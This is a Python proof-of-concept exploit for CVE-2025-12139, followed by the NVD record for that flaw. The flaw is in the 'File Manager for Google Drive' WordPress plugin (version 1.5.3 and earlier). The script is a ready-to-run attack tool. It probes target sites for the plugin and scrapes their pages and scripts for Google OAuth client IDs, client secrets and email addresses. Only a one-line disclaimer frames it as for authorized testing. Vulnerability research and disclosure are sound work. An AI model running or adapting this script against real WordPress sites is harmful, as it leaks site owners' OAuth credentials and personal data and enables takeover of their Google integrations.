CVE-2025-12139

# CVE-2025-12139 PoC - WordPress Google Drive File Manager Information Disclosure # Affected Plugin: File Manager for Google Drive - Integrate Google Drive with WordPress # Affected Version: <= 1.5.3 # CVSS Score: 7.5 (High) import requests import re import json from urllib.parse import urljoin def extract_sensitive_data(target_url): """ Extract sensitive information from the vulnerable WordPress plugin. This PoC demonstrates how unauthenticated attackers can obtain: - Google OAuth client_id - Google OAuth client_secret - Google account email addresses """ results = { 'vulnerable': False, 'sensitive_data': {}, 'endpoints': [] } # Common WordPress paths for the vulnerable script paths = [ '/wp-content/plugins/integrate-google-drive/assets/js/backend.min.js', '/wp-content/plugins/integrate-google-drive/build/backend.js', '/wp-admin/admin-ajax.php', '/' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } for path in paths: url = urljoin(target_url, path) try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: # Search for OAuth credentials in response client_id_pattern = r'["\']?client_id["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']' client_secret_pattern = r'["\']?client_secret["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']' email_pattern = r'["\']?[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}["\']' client_ids = re.findall(client_id_pattern, response.text) client_secrets = re.findall(client_secret_pattern, response.text) emails = re.findall(email_pattern, response.text) if client_ids or client_secrets: results['vulnerable'] = True results['endpoints'].append(url) if client_ids: results['sensitive_data']['client_ids'] = list(set(client_ids)) if client_secrets: results['sensitive_data']['client_secrets'] = list(set(client_secrets)) if emails: results['sensitive_data']['emails'] = list(set(emails)) except requests.RequestException as e: print(f"Error accessing {url}: {e}") return results def check_wordpress_plugin(target_url): """ Check if the vulnerable plugin is installed. """ check_paths = [ '/wp-content/plugins/integrate-google-drive/', '/wp-content/plugins/integrate-google-drive/readme.txt', '/wp-content/plugins/integrate-google-drive/integrate-google-drive.php' ] for path in check_paths: url = urljoin(target_url, path) try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: return True except: continue return False if __name__ == '__main__': import sys if len(sys.argv) < 2: print("Usage: python cve-2025-12139.py <target_url>") print("Example: python cve-2025-12139.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Checking target: {target}") print(f"[*] CVE-2025-12139 - WordPress Google Drive Plugin Information Disclosure\n") # Check if plugin is installed if check_wordpress_plugin(target): print("[+] Vulnerable plugin detected!") else: print("[-] Plugin not found or target is not a WordPress site") # Extract sensitive data results = extract_sensitive_data(target) if results['vulnerable']: print("[+] VULNERABLE - Sensitive data found!") print(f"\n[+] Endpoints with sensitive data:") for endpoint in results['endpoints']: print(f" - {endpoint}") print(f"\n[+] Extracted sensitive information:") if 'client_ids' in results['sensitive_data']: print(f" Client IDs: {', '.join(results['sensitive_data']['client_ids'])}") if 'client_secrets' in results['sensitive_data']: print(f" Client Secrets: {', '.join(results['sensitive_data']['client_secrets'])}") if 'emails' in results['sensitive_data']: print(f" Email Addresses: {', '.join(results['sensitive_data']['emails'])}") else: print("[-] No sensitive data detected (may be patched or not vulnerable)") print("\n[!] Disclaimer: This PoC is for authorized security testing only.")

{"cve": {"id": "CVE-2025-12139", "sourceIdentifier": "[email protected]", "published": "2025-11-05T07:15:32.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The File Manager for Google Drive – Integrate Google Drive with WordPress plugin for WordPress is vulnerable to sensitive information exposure in all versions up to, and including, 1.5.3 via the \"get_localize_data\" function. This makes it possible for unauthenticated attackers to extract sensitive data including Google OAuth credentials (client_id and client_secret) and Google account email addresses."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/integrate-google-drive/tags/1.5.3/includes/class-enqueue.php#L232", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/integrate-google-drive/tags/1.5.3/includes/class-enqueue.php#L243", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/integrate-google-drive/tags/1.5.3/includes/class-enqueue.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3387825/integrate-google-drive", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/607073ad-3a4a-4a21-af0f-3ade81382605?source=cve", "source": "[email protected]"}]}}